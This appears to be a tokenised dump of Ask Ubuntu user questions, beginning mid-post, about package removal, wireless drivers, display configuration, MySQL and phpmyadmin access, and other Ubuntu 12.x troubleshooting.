libnetx-java libasm3-java libamd2.2.0 libswing-layout-java libregexp-java libgnomeui-common libmysql-java libswingx1-java libibverbs1 libnb-absolutelayout-java fastjar libjemmy2-java libois-1.3.0 libjasper-java libmpg123-0 libmpg123-0 : i386 libdb4.8 libsasl2-2 : i386 libgsoap1 libcommons-codec-java libcommons-lang-java libhamcrest-java liblucene2-java libgeronimo-osgi-support-java libheimntlm0-heimdal : i386 libequinox-osgi-java libxdamage1 : i386 libcommons-parent-java libcommons-collections3-java libbeansbinding-java libgcj-common libodbc1 libcommons-net1-java libexif12 : i386 libglu1-mesa : i386 fonts-droid libopenjpeg2 libbonoboui2-common libcommons-digester-java libbindex-java libxcursor1 : i386 libini4j-java libjetty-java libsasl2-modules : i386 libaprutil1 libqrupdate1 libqhull5 antlr3 libxerces-c3.1 libjline-java libxrandr2 : i386 libcrystalhd3 libnb-org-openide-modules-java libdevil1c2 libswt-glx-gtk-3-jni libpostgresql-jdbc-java libgnomecanvas2-common libltdl7 : i386 ttf-droid libkrb5-26-heimdal : i386 libganymed-ssh2-java libnb-org-openide-util-lookup-java libllvm3.0 : i386 libgphoto2-2 : i386 use 'apt-get autoremove ' to remove them . the following packages will be removed : activity-log-manager-control-center aisleriot alacarte apport-gtk apt-transport-https aptdaemon apturl bamfdaemon baobab bluez-cups brasero brasero-cdrkit chromium-browser chromium-browser-l10n chromium-codecs-ffmpeg cmake compiz compiz-fusion-plugins-extra compiz-gnome compiz-plugins-extra compiz-plugins-main compiz-plugins-main-default compizconfig-backend-gconf compizconfig-settings-manager cups cups-bsd cups-client cups-filters cups-pk-helper cups-ppdc curl dconf-tools default-jre default-jre-headless deja-dup eclipse eclipse-jdt eclipse-pde eclipse-platform eclipse-rcp emacs23 empathy eog evince evolution-data-server file-roller firefox firefox-globalmenu firefox-gnome-support flashplugin-installer gcalctool gconf-service gconf-service-backend gconf2 gedit geoclue geoclue-ubuntu-geoip ghex ghostscript ghostscript-cups ghostscript-x ginn gir1.2-appindicator3-0.1 gir1.2-caribou-1.0 gir1.2-clutter-1.0 gir1.2-dbusmenu-gtk-0.4 gir1.2-gconf-2.0 gir1.2-gkbd-3.0 gir1.2-gnomebluetooth-1.0 gir1.2-gtk-2.0 gir1.2-gtk-3.0 gir1.2-gtksource-3.0 gir1.2-launchpad-integration-3.0 gir1.2-mutter-3.0 gir1.2-panelapplet-4.0 gir1.2-peas-1.0 gir1.2-rb-3.0 gir1.2-soup-2.4 gir1.2-ubuntuoneui-3.0 gir1.2-vte-2.90 gir1.2-webkit-3.0 gir1.2-wnck-3.0 git gksu glib-networking gnome-applets gnome-applets-data gnome-bluetooth gnome-contacts gnome-control-center gnome-disk-utility gnome-font-viewer gnome-games-data gnome-icon-theme gnome-icon-theme-full gnome-icon-theme-symbolic gnome-keyring gnome-media gnome-nettool gnome-online-accounts gnome-orca gnome-panel gnome-panel-data gnome-power-manager gnome-screensaver gnome-screenshot gnome-session gnome-session-bin gnome-session-canberra gnome-session-fallback gnome-settings-daemon gnome-shell gnome-sudoku gnome-system-log gnome-system-monitor gnome-terminal gnome-terminal-data gnome-themes-standard gnome-tweak-tool gnome-user-guide gnome-user-share gnomine gnuplot gnuplot-x11 gparted gs-cjk-resource gstreamer0.10-gconf gstreamer0.10-nice gstreamer0.10-plugins-bad gstreamer0.10-plugins-good gtk2-engines gtk2-engines-murrine gtk3-engines-unico gucharmap gvfs-backends gwibber hardinfo hplip humanity-icon-theme ibus ibus-gtk ibus-gtk3 ibus-pinyin ibus-table icedtea-6-jre-cacao icedtea-6-jre-jamvm indicator-applet-complete indicator-application indicator-appmenu indicator-datetime indicator-messages indicator-power indicator-printers indicator-session indicator-sound indicator-status-provider-mc5 indicator-status-provider-pidgin jockey-common jockey-gtk kerneloops-daemon landscape-client-ui-install language-selector-gnome libappindicator1 libappindicator3-1 libatk-wrapper-java-jni libavahi-ui-gtk3-0 libbamf0 libbamf3-0 libbonoboui2-0 libbrasero-media3-1 libcamel-1.2-29 libcanberra-gtk-module libcanberra-gtk0 libcanberra-gtk3-0 libcanberra-gtk3-module libcaribou0 libclutter-1.0-0 libcmis-0.2-0 libcompizconfig0 libcups2 libcupscgi1 libcupsdriver1 libcupsfilters1 libcupsimage2 libcupsmime1 libcupsppdc1 libcurl3 libcurl3-gnutls libcurl3-nss libdmapsharing-3.0-2 libebackend-1.2-1 libebook-1.2-12 libecal-1.2-10 libedata-book-1.2-11 libedata-cal-1.2-13 libedataserver-1.2-15 libedataserverui-3.0-1 libevince3-3 libfarstream-0.1-0 libfolks-eds25 libfolks-telepathy25 libfolks25 libfreerdp-plugins-standard libgail-3-0 libgail-common libgail18 libgconf2-4 libgcr-3-1 libgdata13 libgdu-gtk0 libgksu2-0 libglade2-0 libgnome-bluetooth8 libgnome-control-center1 libgnome-desktop-3-2 libgnome-media-profiles-3.0-0 libgnome2-0 libgnome2-common libgnomecanvas2-0 libgnomekbd7 libgnomeui-0 libgnomevfs2-0 libgnomevfs2-common libgnutls26 libgoa-1.0-0 libgpod-common libgpod4 libgrip0 libgs9 libgssdp-1.0-3 libgtk-3-0 libgtk-3-bin libgtk2-perl libgtk2.0-0 libgtk2.0-bin libgtkhex-3-0 libgtkmm-2.4-1c2a libgtkmm-3.0-1 libgtksourceview-3.0-0 libgtkspell-3-0 libgtkspell0 libgucharmap-2-90-7 libgupnp-1.0-4 libgupnp-igd-1.0-4 libgweather-3-0 libgweather-common libgwibber-gtk2 libido3-0.1-0 libimobiledevice2 libindicator3-7 libindicator7 liblaunchpad-integration-3.0-1 liblaunchpad-integration1 libldap-2.4-2 libmetacity-private0 libmusicbrainz3-6 libmutter0 libnautilus-extension1a libnb-apisupport3-java libnb-ide14-java libnb-java5-java libneon27-gnutls libnice10 libnm-gtk0 liboauth0 liboverlay-scrollbar-0.2-0 liboverlay-scrollbar3-0.2-0 libpam-winbind libpanel-applet-4-0 libpeas-1.0-0 libpurple0 libqtbamf1 libqtgconf1 libquvi7 libraptor2-0 librasqal3 librdf0 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-us libreoffice-impress libreoffice-math libreoffice-style-human libreoffice-style-tango libreoffice-writer librest-0.7-0 librhythmbox-core5 librsvg2-common librtmp0 libsane-hpaio libslv2-9 libsmbclient libsoup-gnome2.4-1 libsoup2.4-1 libspectre1 libsvn-java libsvn1 libsvnclientadapter-java libswt-gnome-gtk-3-jni libswt-gtk-3-java libswt-gtk-3-jni libswt-webkit-gtk-3-jni libsyncdaemon-1.0-1 libtelepathy-farstream2 libtimezonemap1 libtotem-plparser17 libubuntuoneui-3.0-1 libunique-3.0-0 libunity-2d-private0 libunity-core-5.0-5 libunity-misc4 libvncserver0 libvte-2.90-9 libvte9 libwebkitgtk-1.0-0 libwebkitgtk-3.0-0 libwnck-3-0 libwnck22 libwxgtk2.8-0 libxmlrpc-core-c3 libyelp0 light-themes lynx lynx-cur mahjongg metacity metacity-common mousetweaks mplayer2 mutter-common mythes-en-us nautilus nautilus-sendto nautilus-sendto-empathy nautilus-share netbeans network-manager-gnome network-manager-pptp-gnome notify-osd ntfs-3g octave3.2 onboard oneconf openjdk-6-jdk openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib overlay-scrollbar pidgin pidgin-libnotify policykit-1-gnome printer-driver-c2esp printer-driver-foo2zjs printer-driver-gutenprint printer-driver-hpcups printer-driver-pnm2ppa printer-driver-postscript-hp printer-driver-ptouch printer-driver-sag-gdi printer-driver-splix pulseaudio-module-gconf python-appindicator python-aptdaemon python-aptdaemon.gtk3widgets python-aptdaemon.pkcompat python-compizconfig python-cups python-cupshelpers python-gconf python-gmenu python-gnomekeyring python-gtk2 python-ibus python-notify python-pycurl python-smbc python-software-properties python-ubuntu-sso-client python-ubuntuone-control-panel python-uno python-virtkey remmina remmina-plugin-rdp remmina-plugin-vnc rhythmbox rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rhythmbox-ubuntuone samba-common-bin seahorse sessioninstaller shotwell simple-scan smbclient software-center software-properties-gtk ssh-askpass-gnome subversion synaptic system-config-printer-common system-config-printer-gnome system-config-printer-udev telepathy-gabble telepathy-haze telepathy-indicator telepathy-salut thunderbird thunderbird-globalmenu thunderbird-locale-en thunderbird-locale-en-us transmission-gtk ubuntu-artwork ubuntu-desktop ubuntu-docs ubuntu-mono ubuntu-sso-client ubuntu-sso-client-gtk ubuntuone-client ubuntuone-client-gnome ubuntuone-control-panel ubuntuone-installer unity unity-2d unity-2d-panel unity-2d-shell unity-2d-spread unity-asset-pool unity-common unity-greeter unity-lens-applications unity-scope-video-remote unity-services update-manager update-notifier upower usb-creator-gtk vino virtualbox virtualbox-dkms virtualbox-qt vlc vlc-nox vlc-plugin-notify vlc-plugin-pulse whoopsie winbind wine wine1.4 wine1.4-amd64 wine1.4-common wine1.4-i386 : i386 xdg-user-dirs-gtk xdiagnose xul-ext-ubufox yelp zeitgeist zeitgeist-datahub zenity 0 upgraded , 0 newly installed , 467 to remove and 0 not upgraded . after this operation , 1,807 mb disk space will be freed . do you want to continue [ y/n ] ? removing 1.8gb of ubuntu staff is this right way to go ? this is even worse than yesterday when i had to remove qt libraries and everything depending on it ( almost every second app with gui ) in order to install vlc player . i am using ubuntu 12.04 lts . thanks in advance for explanation .
263409	not getting output for currencyconverter standard app	i am running the ubuntu 12.04.2 lts version on my system and have also installed the ubuntu sdk as instructed in : http : //developer.ubuntu.com/get-started/gomobile/ # step-get-toolkit also , i have tried developing my first app as taught in : http : //developer.ubuntu.com/resources/app-developer-cookbook/mobile/currency-converter-phone-app/ but the problem is , when i run the program i get only a blank screen as my output and i see the following set of lines at the console after i have run the program : starting /usr/lib/i386-linux-gnu/qt5/bin/qmlscene /home/roopa/currencyconverter/currencyconverter.qml qt at-spi : error getting the accessibility dbus address : `` the name org.a11y.bus was not provided by any .service files '' accessibility dbus not found . falling back to session bus . qopenglshader : could not create shader qopenglshader : could not create shader /usr/lib/i386-linux-gnu/qt5/bin/qmlscene exited with code 0 i am unable to understand what this is . can anybody please help me regarding this ? please find the code that i have tried to run : import qtquick 2.0 import ubuntu.components 0.1 mainview { objectname : `` mainview '' applicationname : `` currencyconverter '' id : root width : units.gu ( 60 ) height : units.gu ( 80 ) property real margins : units.gu ( 2 ) property real buttonwidth : units.gu ( 9 ) label { id : title itemstyle.class : `` title '' text : i18n.tr ( `` currency converter '' ) height : contentheight + root.margins anchors { left : parent.left right : parent.right top : parent.top } } }
263411	how to install wireless driver broadcom sta ( wl ) for asus x201e with kernel 3.8.1	i need to install any working driver for wireless for this laptop , however , after re-installing bcmwl-kernel-source which was installed with os , i get this : modprobe wl fatal : error inserting wl ( /lib/modules/3.5.0-25-generic/updates/dkms/wl.ko ) : invalid argument this driver previously worked but i was trying to get some alternative , because this driver is proprietary and did n't work with kernel 3.8.1 which i wanted to install ( i am using btrfs filesystem and this new kernel fixes some issues with that ) . so i rebooted back to official kernel 3.5.0 but i am unable to get this driver to work again . now everytime i try to load it using modprobe , it return this error dmesg : [ 1966.302971 ] wl : disagrees about version of symbol cfg80211_scan_done [ 1966.302983 ] wl : unknown symbol cfg80211_scan_done ( err -22 ) [ 1966.303062 ] wl : disagrees about version of symbol cfg80211_disconnected [ 1966.303067 ] wl : unknown symbol cfg80211_disconnected ( err -22 ) [ 1966.303112 ] wl : disagrees about version of symbol wiphy_register [ 1966.303116 ] wl : unknown symbol wiphy_register ( err -22 ) [ 1966.303130 ] wl : disagrees about version of symbol wiphy_new [ 1966.303134 ] wl : unknown symbol wiphy_new ( err -22 ) [ 1966.303143 ] wl : disagrees about version of symbol cfg80211_put_bss [ 1966.303147 ] wl : unknown symbol cfg80211_put_bss ( err -22 ) [ 1966.303156 ] wl : disagrees about version of symbol cfg80211_roamed [ 1966.303160 ] wl : unknown symbol cfg80211_roamed ( err -22 ) [ 1966.303179 ] wl : disagrees about version of symbol lib80211_get_crypto_ops [ 1966.303184 ] wl : unknown symbol lib80211_get_crypto_ops ( err -22 ) [ 1966.303201 ] wl : disagrees about version of symbol cfg80211_ibss_joined [ 1966.303205 ] wl : unknown symbol cfg80211_ibss_joined ( err -22 ) [ 1966.303224 ] wl : disagrees about version of symbol cfg80211_michael_mic_failure [ 1966.303228 ] wl : unknown symbol cfg80211_michael_mic_failure ( err -22 ) [ 1966.303236 ] wl : disagrees about version of symbol cfg80211_connect_result [ 1966.303240 ] wl : unknown symbol cfg80211_connect_result ( err -22 ) [ 1966.303270 ] wl : disagrees about version of symbol wiphy_unregister [ 1966.303274 ] wl : unknown symbol wiphy_unregister ( err -22 ) [ 1966.303293 ] wl : disagrees about version of symbol cfg80211_get_bss [ 1966.303297 ] wl : unknown symbol cfg80211_get_bss ( err -22 ) [ 1966.303311 ] wl : disagrees about version of symbol __ieee80211_get_channel [ 1966.303315 ] wl : unknown symbol __ieee80211_get_channel ( err -22 ) [ 1966.303356 ] wl : disagrees about version of symbol ieee80211_channel_to_frequency [ 1966.303360 ] wl : unknown symbol ieee80211_channel_to_frequency ( err -22 ) [ 1966.303383 ] wl : disagrees about version of symbol cfg80211_inform_bss_frame [ 1966.303387 ] wl : unknown symbol cfg80211_inform_bss_frame ( err -22 ) [ 1966.303417 ] wl : disagrees about version of symbol wiphy_free [ 1966.303421 ] wl : unknown symbol wiphy_free ( err -22 ) i know that proprietary drivers are not much supported by ubuntu , but is there any other driver working with this ?
263412	regarding apt-cache search -n on iphone	i try to search certain package using apt-cache search -n iap cracker , but some list from /var/lib/apt/lists it 's not appear . example : ojek : ~ root # apt-cache search -n iap cracker com.ihacksrepo.iapcracker - free inapp purchases com.repocydia.iapcrackerlist - a list for the apps/games that work with iap cracker com.xsellize.iapcrackerlist - a list for the apps/games that work with iap cracker com.sinfuliphone.iapcracker - allows you to get free in-app purchases ! one of the repo list that not appear in search output : package : com.duowan.urus.iap version : 0.8-1 architecture : iphoneos-arm installed-size : 132 maintainer : duowan depends : mobilesubstrate section : [ å¤^úç^î© - è½¯ä»¶ ] icon : file : ///applications/cydia.app/sections/utilities.png priority : standard homepage : http : //iphone.duowan.com/ depiction : http : //iphone.duowan.com/1109/179506764380.html description : è®©ä½ ç^ú^ä app å^å^íè´¹ä¸^ëè½½å^æ^åç½®ä»^øè´¹å^æ^åå®¹å^ï^êdlcå^æ^ $ sponsor : duowan.com < http : //iphone.duowan.com/m/ > name : iap cracker filename : debs/com.duowan.urus.iap_0.8-1_iphoneos-arm.deb size : 56752 md5sum : 46e4837d42a287e1411a468f22e0489a how to ensure i able to get output every name im searching ? sorry for my english .
263414	gnome terminal is not working properly	i 'm new to ubuntu 12.04 lts . my problem is described below . my terminal prompt is the $ sign only . it 's not showing like kaushik-kaushik-pc - $ . my second problem is that when i try to become the super user by sudo su , it prompts for my password but after that , it shows authentication fail . when i 'm trying to use previous commands by using the ↑ key , it prints this ^ [ [ a , nor does it work for the ← or → keys .
263417	shared internet connection - console equvalent	i know how to share ethernet connection ( bridged with wifi ) with network manager gui . now i 'm trying to do the same from console ( ubuntu server 12.04 ) . the steps i did for now : connected to wifi via wpa_supplicant , exported iptables rules ( from desktop version ) with iptables-save . what the next steps i have to do , for successfully sharing ethernet connection ?
263421	ubuntu in virtualbox wants to install on every boot	i have installed ubuntu 11.10 using virtual box in my windows xp . i have use ubuntu 11.10 iso to install it . first time when i installed every thing was fine but when i shutdown the virtualbox and start ubuntu again , it asks me to install ubuntu and try ubuntu without installing . do i need to do some extra settings ?
263424	ubuntu 12.04 installed rhythmbox 2.97 instead of 2.98	i 've added ppa webupd8team/rhythmbox and doing sudo apt-get update & & sudo apt-get install rhythmbox . i do restart but it does n't install the latest version ( 2.97 installed ) is there any way to install the `` 2.98 '' or it does n't supported for 12.04 ?
263432	how to install winexe on ubuntu ?	i do n't seem to find a working tutorial on how to install winexe , which is a program that allows for execution of commands on a windows machine remotely from a linux machine . none of the tutorials i 've followed so far has worked on my ubuntu 12.04 .
263434	`` already executing '' ?	in my ubuntu launcher i have two icons with question marks on them . when i hover my mouse over them they read `` already executing '' . what is this and can i remove them ? i am an extremely zero-experienced linux user and would appreciate an answer even i could understand . -thank you : )
263438	moving bytes from one files to another	i have an empty file ( only zeroes are in it ) of size 9,0kb and i need to write another file ( with size 1,1kb ) to it , but the first file must not lose it 's . so if the whole file is 00000000000000 ... now , i need to write second file in it and leave the zeroes as they are . i have tried to use dd , but i have n't succeed - file resizes . dd if=out/one.img of=out/go.img does anybody know how can i do it ?
263441	ubuntu 12.04 does not always boot at the first time	i have a recurring problem : my ubuntu 12.4 does not always boots at once . i often get a message on a black screen , saying `` media test failure , check cable '' ( it is not only this what 's on the screen ) , then i manually switch off computer and boot it again . sometimes it goes for a few times , sometimes it boots without problem . i also once got this message : [ 51868,988433 ] read-error on swap-device ( 8:0:155339776 ) [ 51868,990237 ] end_request : i/0 error , dev sda , sector 46906216 [ 51869,006467 ] ext4-fs ( sda1 ) : i/0 error while writing superblock [ 51869,020068 ] end_request : i/0 error , dev sda , sector 155376640 and further repeating lines `` read-error on swap-device '' and `` end_request : i/0 error , dev sda , sector '' , just with different number configurations . i applied the same solution ( switching off ) and it was working again . my hard drive might be quite old , i am using it for a year , but the computer was already second-hand , so i do not know , how long someone else was using it before me . computer aspire 5100 system details : release 12.4 ( precise ) 32-bit kernel linux 3.2.0-38-generic-pae gnome 3.4.2 hardware memory : 1.8 gib processor : amd turion ( tm ) 64 mobile technology mk-36 system status available disc space : 11.6 gib i guess that it might have to do with low disc space , total file-system capacity is 78.3 gb , total usage 79 percent ( 61.8 gb ) . how much i should free up so that computer would run without problems ? that it does not boot at once , would not be such a big problem , but i am afraid that once it will not boot at all . i have been looking at the forums and found some suggestions , but i am not sure , can i apply them to my case ; i am amateur user . i would appreciate your help . thank you very much !
263445	deploying to ubuntu phone os	i have set up the development kit using the command line options shown on the go mobile site and started qt creator . did the first tutorial and wanted to see it on my ubuntu phone tablet but it could not find the device . also qt creator was v4 but i then updated with qt5 creator . i can test the application on the desktop but cant find a way to configure the device and the device tab do n't exist.. you need to go into options to see it and nowhere can i see ubuntu device ... please help me to get the last thing set up . i am working on a few applications for the device and want to test on the nexus 7 .
263447	how to make os to skip mouse and keyboard inputs ?	i am developing application in linux environment . while application is running i want os to ignore inputs from mouse and keyboard . how can i do that in linux ?
263450	folders showing lock icon	whenever i open my documents , all the folders in it are displayed with a lock icon . therefore , i can not delete any file or folder in it . i tried changing the root access using sudo chmod user : directory/ but it fails . i am not able to delete or perform any file action with it . what action should i perform to fix it ?
263451	how to run php code in browser directly from geany ?	i 'm using a latest geany version from official repositories , same with a php5 package . there is my question : how to run php code from geany directly in web browser instead of terminal ? i know , there are some options about what program needs to be runned ( terminal , browser , and grep ) , but i have no idea where it is used .
263455	show full disk usage after recovering files using photorec to the home directory & deleting them as root	i selected my home directory as destination to recover some deleted files using photorec from another partition ( ntfs ) . during the file recovery , my file system partition ran out of space & photorec halted.then i deleted all of the recovered files from my home directory . then i got an error message `` can not find or ... . locate graphic driver ... . '' ( i ca n't recall exactly what it was ) in a dialogue box on a black screen . then i booted to my backup os , linux mint , in the file manager it showed my ubuntu partition is completely used & 0 bytes free , then i moved some of my large video file from my home directory in ubuntu to another partition & freed some space . after freeing some space , i booted up ubuntu & there was no error messages . but my system partition is 90 % used . in the disk usage analyzer , indicates that my file system has only used 23.5gb . but disk usage analyzer also indicates below the tool bar : used 82.5gb & available 8.3gb . how can i gain the lost disk space ?
263458	ubuntu 12.10 wireless is n't closed when i reboot the system	ubuntu 12.10 : wireless is n't closed when i reboot the system , it makes the system wait till the wireless closes . when i disable wireless , it restarts correctly . the problem did n't show in ubuntu 12.04 . how can i solve it ?
263459	how can i upload media with minidlna media server or are there any dlna servers that allow this ?	i have been enjoying the minidlna server on my ubuntu box for a while now . it works very well with xbox and a cheap magnavox blue-ray player that i bought . now i am wanting to start uploading media to my server but when i try my devices all come back with the error that uploading is not supported . does anyone know of a dlna server that works with mkv , mp4 , avi and supports upload to the server ?
263460	what does : error broken count > 0 mean ?	i have the message : error broken count > 0 check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f details : the following packages have unmet dependencies : firefox-globalmenu : depends : firefox ( = 19.0+build1-0ubuntu0.12.04.2 ) but 19.0+build1-0ubuntu0.12.04.1 is installed any suggestions ?
263461	where is my boost lib file ?	i am using boost . i installed it using sudo apt-get install . now i am unable to find my boost lib file on my filesystem . i want to include the path of the lib in my qt project . grepping is taking too long : ( i found the includes in /usr/include/boost . but i also need to know the library path .
263463	put ubuntu touch on samsung gs3 ?	i saw that ubuntu touch has been released and am wondering what the steps are in order to put it onto my samsung galaxy s3 . i currently have an un-rooted gs3 running jellybean and would love to get ubuntu on it ( especially if they can run side-by-side ) . if anybody can help walk me through it , i 'd be grateful . if there 's a walkthrough somewhere online which i have n't been able to find yet , i 'd be appreciative to get a link too . thank you very much !
263464	wordpress on ubuntu 127.0.0.1 is not working	i 've been trying to get wordpress to work on my ubuntu 10.04 lts system and nothing seems to work . i did everything as i should ( according to http : //codex.wordpress.org/installing_wordpress ) but i still ca n't access the wordpress setup configuration page . at first i was getting the '404 page not found ' error but now when i enter http : //127.0.0.1/wordpress it just says that the webpage is not available . with 'localhost/wordpress ' i got the same result . how do i fix this ? i 've been at it for like 3-days ! help please !
263467	why i can not see network shares on nautilus ?	i 'm running ubuntu 12.04 . i 'm not able to see my workgroup and network shares when clicking on browse network in nautilus . this is very important for my work . i can access windows and ubuntu folders typing nautilus smb : //192.168.x.x in the terminal . a windows pc can access ubuntu 's shares . smbtree does n't give anything .
263468	i can not access phpmyadmin	i had install phpmyadmin , using this : sudo apt-get install phpmyadmin after that , i wrote in url : http : /localhost/phpmyadmin but it wo n't work . not found , this error appear , so what to do ? any solution would be advisable : )
263469	inefficient power management	i 've got a hp envy m6 1178ea notebook which has a battery life of about 6 hours when running on windows 8 . i recently installed ubuntu 12.10 ( quantal ) 64-bit and the indicator shows a battery life of just 2 hours when fully charged . moreover , the fan keeps running continuously , which is pretty annoying . is there a way to fix it ?
263479	in ubuntu windows and menus in gnome looks like kde	in ubuntu 12.10 i run kde once ( usually i use gnome ) , after that all windows , menus , icons and so on looks like kde , not gnome theme . how enable again gnome look ?
263481	no private directories found when i do have one ?	i have 2 hard drives that are both running ubuntu 12.10 . one of the hard drives does n't boot correctly but has the files i want to get from it . it also has an encrypted home directory and the bootable ubuntu hard drive does not . now i tried to get inside of my non-bootable hard drive 's home directory with the following command using my working ubuntu machine i 'm on right now : user @ user : ~ $ sudo ecryptfs-recover-private info : searching for encrypted private directories ( this might take a while ) ... info : hint : click 'places ' and select your hard disk , then run this again . error : no private directories found ; make sure that your root filesystem is mounted . but as you can see , it does n't find it . i have the passphrase for the nonbootable hard drives encrypted home directory . so , what can i do to access the directory and copy those files to my working ubuntu hard drive or the external one i have ?
263483	what are the risks of not using a firewall ( home computer ) ?	since a password is required to be a superuser ( to install and modify programs ) , what are the risks to not use a firewall under ubuntu ? more particularly if i am using a nat router ?
263489	connect to mysql on ubuntu server	the connection worked fine the other day and for some reason is does n't . mysql is running in ubuntu server 12.04 and i am trying to connect to a database using odbc connector 5.1 from windows 7 . i have tried commenting out and keeping the bind-address in the cnf file . i have tried to grant all access . i have been reading endless amounts of tutorials and posting to attempt to figure it out . i can not figure out what is going on , also i am a newbie to all this and i have noticed that most posting leave out some minor things that others may be attuned to . help ! thanks in advance . the service is running and i get the following from netstat -tlpen | grep mysql : tcp 0 0.0.0.0.0:3306 0.0.0.0 : * listen 106 15172 3565/mysqld i get the following from netstat -tlpen : active internet connections ( only servers ) proto recv-q send-q local address foreign address state user inode pid/program name tcp 0 0 0.0.0.0:3306 0.0.0.0 : * listen 106 15172 3565/mysqld tcp 0 0 0.0.0.0:139 0.0.0.0 : * listen 0 7092 776/smbd tcp 0 0 0.0.0.0:111 0.0.0.0 : * listen 0 8325 784/rpcbind tcp 0 0 0.0.0.0:10000 0.0.0.0 : * listen 0 9759 1325/perl tcp 0 0 0.0.0.0:44819 0.0.0.0 : * listen 0 9584 - tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 0 8809 947/sshd tcp 0 0 0.0.0.0:445 0.0.0.0 : * listen 0 7090 776/smbd tcp 0 0 0.0.0.0:2049 0.0.0.0 : * listen 0 9000 - tcp6 0 0 : ::139 : : : * listen 0 7088 776/smbd tcp6 0 0 : ::111 : : : * listen 0 8328 784/rpcbind tcp6 0 0 : ::22 : : : * listen 0 8811 947/sshd tcp6 0 0 : ::445 : : : * listen 0 7085 776/smbd tcp6 0 0 : ::2049 : : : * listen 0 9003 - tcp6 0 0 : ::47906 : : : * listen 0 9586 - iptable -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination
263502	dual montiors , one stuck at 640x480	i have a dual monitor setup using the viewsonic below as my primary and the acer as my secondary . i 'm assuming that the acer does not send the edid so it 's not picking up on the correct native resolution . the viewsonic works right away when i installed the nvidia drivers . that has a native resolution of 1440x900 and so does the acer so i know the hardware is capable of that resolution . i have searched and searched and have not been able to get it to work . i 've tried adding modes through xrandr but i get an error when i try to add the new mode to the output the acer is using . i 've also attempted to add metamodes to the xorg.conf which for some reason do n't show up in the nvidia-settings dialog . hardware : nvidia 8800gts ( specifically this ) viewsonic va1930wm acer al1916w xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.51 ( buildmeister @ swio-display-x86-rhel47-06.nvidia.com ) tue sep 18 18:48:23 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' subsection `` display '' depth 24 endsubsection endsection
263503	downloading ubuntu to usb for another computer ?	i have an asus f5vl that was running vista but when i tried downloading office 2010 the os crashed . now i need a recovery disk to get it back to life but i only have a macbook available to me to download anything and this has no disk capability . i would like to give ubuntu a try but i am wondering is it possible for me to download ubuntu on my macbook to my usb without affecting the macbook and then upload to my asus f5vl ?
263504	what does adding sh do ?	i 'm really new to using terminal and i 've been following guide blindly without knowing why is that there and what does it do..though this guides help me in installing the vmware player . this one worked for me since making the file executable , clicking the file , and run..only say root access is needed . sudo sh vmwareplayer.txt ( renamed it to be shorter ) somehow i know what sudo does but what does sh do ? without it it goes `` vmwareplayer.txt not found '' . and for bundle files why does it end with .txt ?
263506	why does ubuntu 12.10 update to 13.04 on its own ?	i installed ubuntu 12.10 , after few minutes of working i 've got an update and allowed it . after this i see that ubuntu has been upgraded to 13.04 . why ? i am not a developer , just try to work . in software sources in one of tabs there is an extras.ubuntu.com/ubuntu repo . is this responsible for updates to 13.04 ? if i disable those will the problem be gone ?
263508	looking for alternatives to empathy for ubuntu 12.04 and above	i 've been looking around at different messaging software however all the documents online are going back to 2009 . is the any other new alternatives to empathy ? thanks this is different and not a duplicate because i 'm asking about new instant messaging for 12.04 and above . not oldies .
263511	how can i use my tp-link tl-wn7200nd ?	i purchased a usb wireless adapter tp-link tl-wn7200nd , which uses a ralink rt3070 chipset . right now i 'm using ubuntu 12.10 . it detects the adapter as ralink , but when i try to use it , it does n't let me and forces me to use the wireless integrated on the laptop , so i think it 's because of the drivers .
263513	why does x not start and xinit abort ?	for the last four weeks i have n't been able to access my kubuntu graphic environment . after loging in this page appears for about one second after that the login screen appears again with no sign of an error ( be it a wrong password etc ... ) . when trying to log into the console there 's no problem , but starting x from the console results in this error what i 've already tried : reinstalling kde-desktop-environment installing and changing from lightdm to kdm and back checking all .xauthority files and chown them to my account reinstalling xterm reinstalling xserver-xorg none of the above worked . what i did before the error occured : installed some canonical & partner updates added a script to autostart thanks for your help !
263514	problem installing vaapi	i 'm following a wiki on how to make smplayer use the gpu in the netbook integrated graphics chipset , but i 'm stuck at one of the first steps , installing vaapi . i installed libva1 and vainfo by using sudo apt-get install libva1 vainfo , but when i run vainfo it says : libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/i386-linux-gnu/dri/i915_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit i install and i965-va-driver and all that have name libva or vaapi . please help me . netbook dell inspirion 1018 . intel atom 455 .
